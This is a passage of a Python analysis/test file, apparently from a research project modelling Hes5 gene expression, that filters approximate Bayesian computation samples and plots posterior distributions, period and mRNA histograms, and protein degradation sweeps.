np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating_bands_different_prior.pdf'))
def xest_plot_different_prior_in_band(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_bands_different_prior.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]<0.3, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating_bands_long_delay_different_prior.pdf'))
def xest_plot_upsample_hill_abc_in_band(self):
# generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.axes[-1,0].set_xlim(0,5)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_hill_low_transcription.pdf'))
def xest_plot_hill_abc_in_band(self):
# generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_hill_bands.pdf'))
def xest_plot_heterozygous_homozygous_comparison(self):
# generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
number_of_traces_per_sample = 200
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
# model_results = hes5.calculate_heterozygous_summary_statistics_at_parameters( my_posterior_samples,
# number_of_traces_per_sample )
# np.save(os.path.join(os.path.dirname(__file__), 'output','heterozygous_comparison.npy'), model_results)
model_results = np.load(os.path.join(os.path.dirname(__file__), 'output','heterozygous_comparison.npy'))
my_figure = plt.figure( figsize = (6,5) )
my_figure.add_subplot(221)
plt.scatter(model_results[:,0,0]/10000, model_results[:,1,0]/10000,
color = 'grey', lw = 0, marker = '.')
plt.plot(model_results[:,0,0]/10000, model_results[:,0,0]/20000,
color = 'black')
plt.xlabel('Homozygous mean')
plt.ylabel('Allele mean')
plt.text(0.1, 0.8, 'Slope: 1/2',
transform=plt.gca().transAxes)
my_figure.add_subplot(222)
plt.scatter(model_results[:,0,1], model_results[:,1,1],
color = 'grey', lw = 0, marker = '.')
plt.plot(model_results[:,0,1], model_results[:,0,1]*2,
color = 'black')
plt.text(0.1, 0.8, 'Slope: 2',
transform=plt.gca().transAxes)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
# plt.gca().locator_params(axis='y', tight = True, nbins=5)
plt.xlabel('Homozygous std/mean')
plt.ylabel('Allele std/mean')
my_figure.add_subplot(223)
plt.scatter(model_results[:,0,2], model_results[:,1,2],
color = 'grey', lw = 0, marker = '.')
plt.plot(model_results[:,0,2], model_results[:,0,2],
color = 'black')
plt.text(0.1, 0.8, 'Slope: 1',
transform=plt.gca().transAxes)
plt.xlim(0,500)
plt.ylim(0,)
plt.xlabel('Homozygous period')
plt.ylabel('Allele period')
my_figure.add_subplot(224)
plt.scatter(model_results[:,0,3], model_results[:,1,3],
color = 'grey', lw = 0, marker = '.')
plt.plot(model_results[:,0,3], model_results[:,0,3] - 0.2,
color = 'black')
plt.text(0.1, 0.8, 'Slope: 1, offset: -0.2',
transform=plt.gca().transAxes)
plt.ylim(0,)
plt.xlabel('Homozygous coherence')
plt.ylabel('Allele coherence')
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_homozygous_comparison.pdf'))
def xest_plot_langevin_abc_in_band(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_bands.pdf'))
def xest_plot_heterozygous_abc(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
sns.set()
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_bands.pdf'))
def xest_plot_langevin_abc_in_band_oscillating_different_prior(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_oscillating_bands_different_prior.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating_different_prior(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_small_prior')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating_bands_different_prior.pdf'))
def xest_plot_hill_abc_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_hill_oscillating.pdf'))
def xest_plot_hill_abc_not_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_hill_not_oscillating.pdf'))
def xest_plot_heterozygous_abc_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_oscillating.pdf'))
def xest_plot_langevin_abc_in_band_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.3))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
print('number of accepted samples is ' + str(len(my_posterior_samples)))
# sns.set()
# # plot distribution of accepted parameter samples
# data_frame = pd.DataFrame( data = my_posterior_samples,
# columns= ['transcription_rate',
# 'translation_rate',
# 'repression_threshold',
# 'transcription_delay'])
# pairplot = sns.pairplot(data_frame)
# pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_oscillating_bands.pdf'))
def xest_plot_heterozygous_abc_not_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_100reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.15))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_heterozygous_not_oscillating.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_100reps')
acceptance_ratio = 0.02
total_number_of_samples = 20000
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]<0.2))))) #coherence
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
# sns.set()
# # plot distribution of accepted parameter samples
# data_frame = pd.DataFrame( data = my_posterior_samples,
# columns= ['transcription_rate',
# 'translation_rate',
# 'repression_threshold',
# 'transcription_delay'])
# pairplot = sns.pairplot(data_frame)
# # pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating.pdf'))
def xest_plot_langevin_abc_in_band_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]>0.3, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
# sns.set()
# # plot distribution of accepted parameter samples
# data_frame = pd.DataFrame( data = my_posterior_samples,
# columns= ['transcription_rate',
# 'translation_rate',
# 'repression_threshold',
# 'transcription_delay'])
# pairplot = sns.pairplot(data_frame)
# # pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_oscillating_bands_long_delay.pdf'))
def xest_plot_langevin_abc_in_band_not_oscillating_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
np.logical_and(model_results[:,3]<0.2, #coherence
prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is ' + str(len(my_posterior_samples)))
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
# sns.set()
# # plot distribution of accepted parameter samples
# data_frame = pd.DataFrame( data = my_posterior_samples,
# columns= ['transcription_rate',
# 'translation_rate',
# 'repression_threshold',
# 'transcription_delay'])
# pairplot = sns.pairplot(data_frame)
# # pairplot.map_diag(sns.kdeplot)
# pairplot.map_diag(sns.distplot, kde = False, rug = True)
# pairplot.map_offdiag(sns.kdeplot, cmap="Blues_d", n_levels=10)
# pairplot.map_offdiag(sns.jointplot )
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_not_oscillating_bands_long_delay.pdf'))
def xest_plot_heterozygous_mrna_and_period_distributions(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_mrna_distribution.pdf'))
def xest_plot_low_transcription_mrna_and_period_distributions(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_low_transcription_period_distribution.pdf'))
# new_accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
# np.logical_and(model_results[:,0]<65000, #cell_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# # model_results[:,1]>0.05)))) #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# # prior_samples[:,4]<6))))) #hill
#
# new_periods = model_results[new_accepted_indices][:,2]
#
#
# ## need to rerun abc with mrna numbers
# my_figure = plt.figure(figsize = (4,2.5))
# plt.hist(new_periods, bins = 200)
# # plt.hist(new_periods, range = (0,400), bins = 20)
# plt.xlabel('Period [min]')
# plt.ylabel('Occurrence')
# plt.xlim(0,500)
# plt.tight_layout()
# plt.savefig(os.path.join(os.path.dirname(__file__),
# 'output','abc_hill_low_transcription_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_low_transcription_mrna_distribution.pdf'))
def xest_plot_hill_mrna_and_period_distributions(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_period_distribution.pdf'))
new_accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,4]<6))))) #hill
new_periods = model_results[new_accepted_indices][:,2]
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
plt.hist(new_periods, bins = 200)
# plt.hist(new_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.xlim(0,500)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_6_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_hill_mrna_distribution.pdf'))
def xest_plot_mrna_and_period_distributions(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,3]>20))))) #time_delay
## need to rerun abc with mrna numbers
my_figure = plt.figure(figsize = (4,2.5))
all_periods = model_results[accepted_indices][:,2]
plt.hist(all_periods, range = (0,400), bins = 20)
plt.xlabel('Period [min]')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution.pdf'))
my_figure = plt.figure(figsize = (4,2.5))
all_mrna_counts = model_results[accepted_indices][:,4]
plt.hist(all_mrna_counts, range = (0,150), bins = 50)
plt.xlabel('Average mRNA count')
plt.ylabel('Occurrence')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_mrna_distribution.pdf'))
def xest_plot_langevin_abc_in_band_long_delay(self):
## generate posterior samples
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
prior_samples[:,3]>20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
pairplot = hes5.plot_posterior_distributions(my_posterior_samples)
pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output','pairplot_langevin_bands_long_delay.pdf'))
def xest_make_heterozygous_degradation_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 100
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>25000, #cell number
np.logical_and(model_results[:,0]<35000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
np.save(os.path.join(os.path.dirname(__file__), 'output','multiple_degradation_sweep_results_new.npy'),
my_parameter_sweep_results)
def xest_make_multiple_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 100
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories)
np.save(os.path.join(os.path.dirname(__file__), 'output','multiple_degradation_sweep_results_new.npy'),
my_parameter_sweep_results)
def xest_plot_multiple_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 100
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__), 'output','multiple_degradation_sweep_results_new.npy'))
# new_accepted_indices = np.where( my_posterior_samples[:,0] < 10 )
# my_parameter_sweep_results = my_parameter_sweep_results[new_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
plt.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.01)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Period [min]')
plt.ylim(0,700)
my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
plt.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.01)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Coherence')
plt.ylim(0,1)
my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
plt.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.01)
plt.axvline( np.log(2)/90 )
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.ylim(0,15)
plt.xlabel('Hes5 degradation [1/min]')
plt.ylabel('Expression/1e4')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_degradation_sweep.pdf'))
def xest_make_all_multiple_parameter_variation_hill_low_transcription(self):
number_of_parameter_points = 20
number_of_trajectories = 200
